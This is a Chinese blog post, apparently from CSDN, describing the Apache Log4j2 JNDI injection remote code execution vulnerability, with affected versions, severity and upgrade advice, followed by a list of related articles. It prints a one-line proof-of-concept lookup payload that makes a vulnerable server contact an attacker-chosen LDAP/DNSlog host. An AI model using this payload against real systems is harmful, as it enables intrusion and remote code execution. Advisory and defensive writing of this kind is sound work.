Apache Log4j 远程代码执行漏洞分析

最新推荐文章于 2024-05-11 04:48:07 发布
最新推荐文章于 2024-05-11 04:48:07 发布
阅读量5.7k 收藏 1
点赞数 2
分类专栏: 漏洞学习 文章标签: apache 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/121850385
版权

0x00 漏洞描述

apache log4j2是全球使用广泛的java日志框架,同时该漏洞还影响很多全球使用量的Top序列的通用开源组件,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,ApacheStruts2、Apache Solr、Apache Druid、Apache Flink等均受影响

Apache Log4j组件描述:

Apache Log4j 是 Apache 的一个开源项目,ApacheLog4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。

0x01 危害等级

严重

0x02 漏洞复现

Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据被日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。鉴于此漏洞危害较大,建议客户尽快采取措施防护此漏洞。

漏洞poc:${jndi:ldap://xxx/exp} (xxx为dnslog)
漏洞复现分析:
微信公众号”Gaobai文库“后台回复”log4“获取学习

远程命令执行:

本地calc复现:
图片来源于网络

0x03 影响版本

Apache Log4j 2.x <= 2.14.1

0x04 修复建议

目前官方已发布测试版本修复该漏洞,受影响用户可先将Apache Log4j2所有相关应用到该版本,下载链接:

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1
注:由于此版本非正式发行版,可能出现不稳定的情况,建议用户在备份数据后再进行升级。

升级供应链中已知受影响的应用及组件:Apache Solr、Apache Flink、ApacheDruid、srping-boot-strater-log4j2

须知:

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

告白热
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
Log4j2漏洞详解
左右为南的专栏
12-12 5955
Log4j2漏洞JDNI攻击简要代码
Apache Log4j2 远程代码执行漏洞
qq_39912230的博客
12-13 3902
· 漏洞描述 Apache Log4j2是一款非常优秀的Java日志框架,在各大Java项目中广泛应用。12月9日,Apache官方发布了紧急安全更新,修复了Apache Log4j2中发现的远程代码执行漏洞。 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。漏洞风险评级为严重。 ·影响版本 Apache Log4j
Apache Log4j2远程代码执行漏洞
F2444790591的博客
07-08 7881
1、下载、解压、重命名vulhub-master.zip为vulhub 2、进入漏洞环境下,启动该环境。 3、访问目标靶场: 4、在Dnslog.cn中生成接收信息的域名 。 5、提交dnslog payload 参数,进行访问。 6、可以发现dnslog接收到返回的信息,证明存在log4
log4j 2 远程代码执行漏洞原理与搭建反弹shell
flyingwind2000的博客
09-03 2189
本文讲述log4j 远程代码执行漏洞简单原理, 以及如何详细搭建一台服务器进行测试, 同时使用反弹技术控制与接管靶机. 本文假定阅读者具备一定功底, 如初入门级安全渗透人员, 熟练掌握LINUX, 具备简单java开发经验,且熟练使用工具.
2024年最全【紧急】Apache Log4j任意代码执行漏洞安全风险升级修复教程,小白看完都学会了
最新发布
2401_84520026的博客
05-11 780
漏洞描述| 事件 | 描述 || — | — || 漏洞名称 | Apache Log4j 远程代码执行漏洞 || 漏洞类型 | 代码执行 || 风险等级 | 严重 || 公开状态 | 已发现 || 在野利用 | 已发现 || 漏洞描述 | Apache Log4j2 是一款优秀的 Java 日志框架。该日志框架被大量用于业务系统开发,用来记录日志信息。
log
foxox
01-05 127
2009 - 11 - 16 log4j使用方法 为什么要用日志(Log)? 这个……就不必说了吧。 为什么不用System.out.println()? 功能太弱;不易于控制。如果暂时不想输出了怎么办?如果想输出到文件怎么办?如果想部分输出怎么办?…… 为什么同时使用commons-logging和Log4j?为什么不仅...
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行
Apache Log4j 2 远程代码执行漏洞详解
SimpleAstronaut的博客
12-11 1万+
Apache Log4j2 远程代码执行漏洞的详细信息已被披露,而经过分析,本次 Apache Log4j 远程代码执行漏洞,正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记入日志时,攻击者通过构造特殊请求,来触发 Apache Log4j2 中的远程代码执行漏洞,从而利用此漏洞在目标服务器上执行任意代码
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击Log4j2实例。 ...
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
log4j远程执行漏洞,测试源码
12-22
3. **多种协议支持**:除了LDAP和RMI,Log4j还支持其他协议,如JMS、JDBC等,这意味着攻击者有更多方式来触发远程代码执行。 **应对措施与修复** 为防范Log4j漏洞,开发者和管理员可以采取以下措施: 1. **升级到...
Apache Log4j 远程代码执行漏洞批量检测工具
保持微笑的博客
01-10 2999
漏洞描述 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。 影响版本 Apache Log4j 2.x < 2.15.0-rc2 影响范围 含有该漏洞Log4j影响到超过 6000个中间件或应用,目前已知的可能受影响的应用及组件包括但不限于如下清单中所列出的: Sp...
日志框架 --- Log4j
wwzzzzzzzzzzzzz的博客
06-04 6009
log4j是一个流行的Java日志框架,是由 Apache 的一个开源项目。它允许开发人员通过将日志语句插入应用程序代码中来记录应用程序运行时的事件。它能够控制通过哪些目标输出的消息以及每个目标的格式。log4j主要是由 Logger,Appender,Layout 组成,Logger,日志记录器,控制日志的输出级别以及是否输出日志。Appender,控制日志被写入的位置,例如控制台、文件等。Layout,用于定义日志输出的格式。
Log4j详细使用教程
热门推荐
Evankaka的专栏
05-18 5万+
日志是应用软件中不可缺少的部分,Apache的开源项目Log4j是一个功能强大的日志组件,提供方便的日志记录。在apache网站:jakarta.apache.org/log4j 可以免费下载到Log4j最新版本的软件包。
Java日志框架 -- LOG4JLog4j入门案例、日志级别、Log4j组件(Loggers、Appenders、Layouts)、配置文件、内置日志记录、自定义Logger)
天行健 君子以自强不息,地势坤 君子以厚德载物。
06-12 4819
Log4jApache下的一款开源的日志框架,通过在项目中使用 Log4J,我们可以控制日志信息输出到控制台、文件、甚至是数据库中。我们可以控制每一条日志的输出格式,通过定义日志的输出级别,可以更灵活的控制日志的输出过程。方便项目的调试。官方网站: http://logging.apache.org/log4j/1.2/ Log4jTest.java 出现这个的原因是因为我们没有正确的初始化 一般只使用4个级别,优先级从高到低为 ERROR > WARN > INFO > DEBUGLog4J 主要
log4j漏洞分析及总结
csd_ct的专栏
02-14 4万+
2021年12月8号爆出的log4j2远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。 漏洞描述及影响 log4jApache的一个开源项目,是一个基于Java的日志记录框架。Log4j2log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。
Log4j学习笔记
Snail_565的博客
10-30 840
Log4j学习笔记1 入门实例2 Log4j基本使用方法2.1 定义配置文件 1 入门实例 我这里在我的Maven项目中先引入log4j的包 <dependency> <groupId>log4j</groupId> <artifactId>log4j</artifactId> <version>1.2.12<...
处理,Apache Log4j 远程代码执行漏洞 工作
03-07
你好,关于处理 Apache Log4j 远程代码执行漏洞的工作,我们建议及时升级 Log4j 版本,或者禁用 Log4j,以保障系统安全。同时,也需要加强对系统漏洞的监测和防范,及时修复漏洞,确保系统安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值